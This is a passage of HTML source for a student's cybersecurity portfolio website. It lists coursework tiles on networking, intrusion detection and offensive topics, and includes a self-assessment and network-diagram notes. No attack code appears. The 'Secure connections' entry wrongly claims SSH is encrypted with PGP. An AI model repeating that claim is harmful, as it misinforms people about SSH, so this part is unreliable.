          <h4>Fontys S3</h4>
          <p class="text-muted">Network diagram V1</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal3">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/blue/03-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S3</h4>
          <p class="text-muted">Network diagram V2</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal4">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/blue/04-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S3</h4>
          <p class="text-muted">Secure connections</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal5">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/blue/05-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S3</h4>
          <p class="text-muted">IDS/IPS</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal6">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/blue/06-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S3</h4>
          <p class="text-muted">Information Security and Risk Analysis</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal7">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/blue/07-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S3</h4>
          <p class="text-muted">IT Monitoring</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-lg-12 text-center">
          <h4 class="section-subheading text-muted">Red teaming semester</h4>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal8">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/red/08-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S4</h4>
          <p class="text-muted">SQL injection</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal9">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/red/09-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S4</h4>
          <p class="text-muted">Command injection</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal10">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/red/10-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S4</h4>
          <p class="text-muted">Cross-site scripting</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal11">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/red/11-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S4</h4>
          <p class="text-muted">Cross-site request forgery</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal12">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/red/12-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S4</h4>
          <p class="text-muted">Path traversal</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal13">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/red/13-thumbnail.jpeg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S4</h4>
          <p class="text-muted">Password cracking</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal14">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/red/14-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S4</h4>
          <p class="text-muted">Network scanning and enumeration</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal15">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/red/15-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S4</h4>
          <p class="text-muted">Network sniffing and spoofing</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal16">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/red/16-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S4</h4>
          <p class="text-muted">Law, Ethics and Responsible Disclosure</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal17">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/red/17-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S4</h4>
          <p class="text-muted">Basic hacking process</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
           <a class="portfolio-link" data-toggle="modal" href="#portfolioModal18">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/red/18-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S4</h4>
          <p class="text-muted">Self reflection</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-lg-12 text-center">
          <h4 class="section-subheading text-muted">Internship</h4>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal19">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/internship/19-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S5</h4>
          <p class="text-muted">My internship</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-lg-12 text-center">
          <h4 class="section-subheading text-muted">Minor</h4>
          </div>
          </div>
          <div class="row">
          <div class="col-lg-12 text-center">
          <h5 class="section-subheading text-muted">Red teaming specialisation</h5>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal20">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/20-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Pentesting methods</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal21">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/21&22&31-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">HTB Linux write-up</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal22">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/21&22&31-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
           <p class="text-muted">HTB Windows write-up</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal23">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/23-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Red VS Blue Event</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal24">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/24&28&29&30-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Vulnerability analysis session</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal25">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/25-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Personal pen-test toolbox</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal26">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/26-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Security of IOT protocols and technology</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal27">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/27-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Pen-test at COMPANY_NAME_HERE</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal28">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/24&28&29&30-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Vulnerability analysis on a smartphone app</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal29">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/24&28&29&30-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Vulnerability analysis on a website</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal30">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/24&28&29&30-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Vulnerability analysis on a device</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal31">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/21&22&31-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Organize a weekly Hack The Box event</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-lg-12 text-center">
          <h5 class="section-subheading text-muted">Blue teaming specialisation</h5>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal32">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/blue/32-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Red VS Blue Event</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal33">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/blue/33&37-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">IDS technologies</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal34">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/blue/34-thumbnail.svg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Monitoring technologies</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal35">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/blue/35-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">SIEM technologies</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal36">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/blue/36-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Threat use cases</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal37">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/blue/33&37-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Developing and tuning an IDS</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal38">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/blue/38-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Setting up a SOC</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal39">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/blue/39-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Vulnerability scanning</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal40">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/blue/40-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Security monitoring, analysis and triage</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-lg-12 text-center">
          <h5 class="section-subheading text-muted">Forensics specialisation</h5>
          </div>
          </div>
          </div>
          </section>
          
          <section id="about">
          <div class="container">
          <div class="row">
          <div class="col-lg-12 text-center">
          <h2 class="section-heading text-uppercase">About</h2>
          <h3 class="section-subheading text-muted">My cyber security career.</h3>
          </div>
          </div>
          <div class="row">
          <div class="col-lg-12">
          <ul class="timeline">
          <li>
          <div class="timeline-image">
          <img class="rounded-circle img-fluid" src="img/about/1.jpg" alt="">
          </div>
          <div class="timeline-panel">
          <div class="timeline-heading">
          <h4>Fontys S3 2019</h4>
          <h4 class="subheading">The beginning</h4>
          </div>
          <div class="timeline-body">
          <p class="text-muted">This was the first time I got experienced the cyber security stream and what it had to offer. I learned the basics of the defensive side of cyber security.</p>
          </div>
          </div>
          </li>
          <li class="timeline-inverted">
          <div class="timeline-image">
          <img class="rounded-circle img-fluid" src="img/about/2.jpg" alt="">
          </div>
          <div class="timeline-panel">
          <div class="timeline-heading">
          <h4>Fontys S4 2020</h4>
          <h4 class="subheading">Round 2</h4>
          </div>
          <div class="timeline-body">
          <p class="text-muted">This was my second semester on cyber security this time focusing on the offensive side.</p>
          </div>
          </div>
          </li>
          <li>
          <div class="timeline-image">
          <img class="rounded-circle img-fluid" src="img/about/3.png" alt="">
          </div>
          <div class="timeline-panel">
          <div class="timeline-heading">
          <h4>Fontys S5 2021</h4>
          <h4 class="subheading">The internship</h4>
          </div>
          <div class="timeline-body">
          <p class="text-muted">Lorem ipsum dolor sit amet, consectetur adipisicing elit. Sunt ut voluptatum eius sapiente, totam reiciendis temporibus qui quibusdam, recusandae sit vero unde, sed, incidunt et ea quo dolore laudantium consectetur!</p>
           </div>
          </div>
          </li>
          <li class="timeline-inverted">
          <div class="timeline-image">
          <img class="rounded-circle img-fluid" src="img/about/4.jpg" alt="">
          </div>
          <div class="timeline-panel">
          <div class="timeline-heading">
          <h4>Fontys S7 2021</h4>
          <h4 class="subheading">My minor</h4>
          </div>
          <div class="timeline-body">
          <p class="text-muted">Lorem ipsum dolor sit amet, consectetur adipisicing elit. Sunt ut voluptatum eius sapiente, totam reiciendis temporibus qui quibusdam, recusandae sit vero unde, sed, incidunt et ea quo dolore laudantium consectetur!</p>
          </div>
          </div>
          </li>
          
          <li class="timeline-inverted">
          <div class="timeline-image">
          <h4>The
          <br>Future
          </h4>
          </div>
          </li>
          </ul>
          </div>
          </div>
          </div>
          </section>
          
          <section class="bg-light" id="team">
          <div class="container">
          <div class="row">
          <div class="col-lg-12 text-center">
          <h2 class="section-heading text-uppercase">About me</h2>
          <h3 class="section-subheading text-muted">Some additional links and information.</h3>
          </div>
          </div>
          <div class="row">
          <div class="col-sm-4">
          
          </div>
          <div class="col-sm-4">
          <div class="team-member">
          <img class="mx-auto rounded-circle" src="img/team/Pim.jpg" alt="">
          <h4>Pim Beekmans</h4>
          <p class="text-muted">Student</p>
          <ul class="list-inline social-buttons">
          <li class="list-inline-item">
          <a href="#">
          <i class="fab fa-twitter"></i>
          </a>
          </li>
          <li class="list-inline-item">
          <a href="#">
          <i class="fab fa-facebook-f"></i>
          </a>
          </li>
          <li class="list-inline-item">
          <a href="https://www.linkedin.com/in/pim-beekmans/?originalSubdomain=nl">
          <i class="fab fa-linkedin-in"></i>
          </a>
          </li>
          </ul>
          </div>
          </div>
          <div class="col-sm-4">
          
          </div>
          <div class="row">
          <div class="col-lg-8 mx-auto text-center">
          <p class="large text-muted">This is me, thank you for reading, hopefully you've liked my portfolio on cyber security. For additional feedback feel free to send an email to <a href="/cdn-cgi/l/email-protection#09796064496b6c6c626468677a276d6c7f"><span class="__cf_email__" data-cfemail="e191888ca18384848a8c808f92cf858497">[email&#160;protected]</span></a>.</p>
          </div>
          </div>
          </div>
          </div>
          </section>
          
          <section class="py-5">
          <div class="container">
          <div class="row">
          
          </div>
          </div>
          </section>
          
          <section id="contact">
          <div class="container">
          <div class="row">
          <div class="col-lg-12 text-center">
          <h2 class="section-heading text-uppercase">Contact Me</h2>
          <br>
          </div>
          </div>
          <div class="row">
          <div class="col-lg-12">
          <form id="contactForm" name="sentMessage" novalidate="novalidate">
          <div class="row">
          <div class="col-md-6">
          <div class="form-group">
          <input class="form-control" id="name" type="text" placeholder="Your Name *" required="required" data-validation-required-message="Please enter your name.">
          <p class="help-block text-danger"></p>
          </div>
          <div class="form-group">
          <input class="form-control" id="email" type="email" placeholder="Your Email *" required="required" data-validation-required-message="Please enter your email address.">
          <p class="help-block text-danger"></p>
          </div>
          <div class="form-group">
          <input class="form-control" id="phone" type="tel" placeholder="Your Phone *" required="required" data-validation-required-message="Please enter your phone number.">
          <p class="help-block text-danger"></p>
          </div>
          </div>
          <div class="col-md-6">
          <div class="form-group">
          <textarea class="form-control" id="message" placeholder="Your Message *" required="required" data-validation-required-message="Please enter a message."></textarea>
          <p class="help-block text-danger"></p>
          </div>
          </div>
          <div class="clearfix"></div>
          <div class="col-lg-12 text-center">
          <div id="success"></div>
          <button id="sendMessageButton" class="btn btn-primary btn-xl text-uppercase" type="submit">Send Message</button>
          </div>
          </div>
          </form>
          </div>
          </div>
          </div>
          </section>
          
          <footer>
          <div class="container">
          <div class="row">
          <div class="col-md-4">
          <span class="copyright">Copyright &copy; Beekmans.dev 2019</span>
          </div>
          <div class="col-md-4">
          
          </div>
          <div class="col-md-4">
          <ul class="list-inline quicklinks">
          <li class="list-inline-item">
          <a href="#">Privacy Policy</a>
          </li>
          <li class="list-inline-item">
          <a href="#">Terms of Use</a>
          </li>
          </ul>
          </div>
          </div>
          </div>
          </footer>
          
          
          <div class="portfolio-modal modal fade" id="portfolioModal1" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Self Assessment</h2>
          <p class="item-intro text-muted">Week 1</p>
          <p>
          <ol>
          <li>What did you like / or find easy?</li>
          <li>What did you find difficult? At what point did it get too difficult for now?</li>
          <li>
          Then check the list of learning subjects for the basic knowledge assignment and
          possibilities and requirements for the project.
          <ul>
          <li>What subjects do you already know and what is unknown terrain for you?</li>
          </ul>
          </li>
          <li>What parts of the current semester would you like to give much attention?</li>
          <li>What do you want to achieve and learn in particular?</li>
          <li>Which study style and corresponding planning is most suitable for you?</li>
          <li>What would you like to do or achieve in the project? (subjects, type of project,
          domain to work in, learning goals, etc.)
          </li>
          </ol>
          <br>
          Answers:
          <br>
          <ol>
          <li>I like working with servers and playing with my network at home and virtual
          machines. I think I find basic networking the easiest.
          </li>
          <li>Advanced networking all knowledge that I know is self-taught so I think there is a
          lot I don’t know yet. I got stuck on virtual lans and ip routing at home what else
          I’ll find difficult is what I need to find out in the distant future.
          </li>
          <li>
          Subjects:
          <div class="container">
          <div class="row">
          <div class="col-sm-4">
          <ul>
          Used:
          <li>VMWare</li>
          <li>Linux</li>
          <li>IPv4</li>
          <li>NAT</li>
          <li>TCP/IP</li>
          <li>DNS</li>
          <li>HTTP</li>
          <li>FTP</li>
          <li>Firewalls</li>
          <li>HTTPS</li>
          <li>VPN</li>
          </ul>
          </div>
          <div class="col-sm-4">
          <ul>
          Know about but never used:
          <li>VMWare ESX</li>
          <li>Wireshark</li>
          <li>ARP</li>
          <li>IP routing</li>
          <li>SMTP</li>
          <li>IDS</li>
          </ul>
          </div>
          <div class="col-sm-4">
          <ul>
          Never heard about it:
          <li>Seclab</li>
          <li>ICMP ping</li>
          <li>CIA and IT Risk analysis</li>
          </ul>
          </div>
          </div>
          </div>
          </li>
          <li>Advanced networking and the transition to Java.</li>
          <li>How to be a good Cyber security expert.</li>
          <li>Style 2, I’ll try to find out if this is the most suitable for me and maybe go to
          the style 3 courses on the days I get subjects I already know.
          </li>
          <li>I don’t really have a preference I want to learn as much as possible related to
          cyber security.
          </li>
          </ol>
          </p>
          <ul class="list-inline">
          <li>Date: February 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Self assessment</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
           </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal2" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S3</h2>
          <p class="item-intro text-muted">Network diagram</p>
          <img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/NetworkDiagram.png" alt="">
          <p>This network diagram shows 3 main VLAN's containing a employee environment for the
          employees to work on, a guest environment for the people visiting the company as guests
          and a DMZ for the servers and services to the outside world.</p>
          <ul class="list-inline">
          <li>Date: February 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Documentation</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal3" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S3</h2>
          <p class="item-intro text-muted">Network diagram V2</p>
          <img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/NetworkDiagramV2.png" alt="">
          <p>This is the second version of my network diagram. I changed a few things to match
          Casper's feedback. The first thing I changed are the firewalls, I only needed to address
          the physical firewall and not the ones for every single interface. The last thing was I
          added the corresponding IP ranges and subnets to each VLAN.</p>
          <ul class="list-inline">
          <li>Date: March 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Documentation</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal4" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S3</h2>
          <p class="item-intro text-muted">Secure connections</p>
          <a href="../../img/portfolio/blue/sshAccess.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/sshAccess.png" alt=""></a>
          <p>Here you can see that I made a SSH connection to my Ubuntu webserver. I use Putty as my
          SSH terminal. SSH is encrypted using PGP (Pretty good privacy) which uses a public and a
          private key to communicate with each other. This is especially helpful because you don't
          need to transfer passwords to encrypt the connection. The sending client encrypts its
          message using the public key from the recipient and the recipient decrypts the message
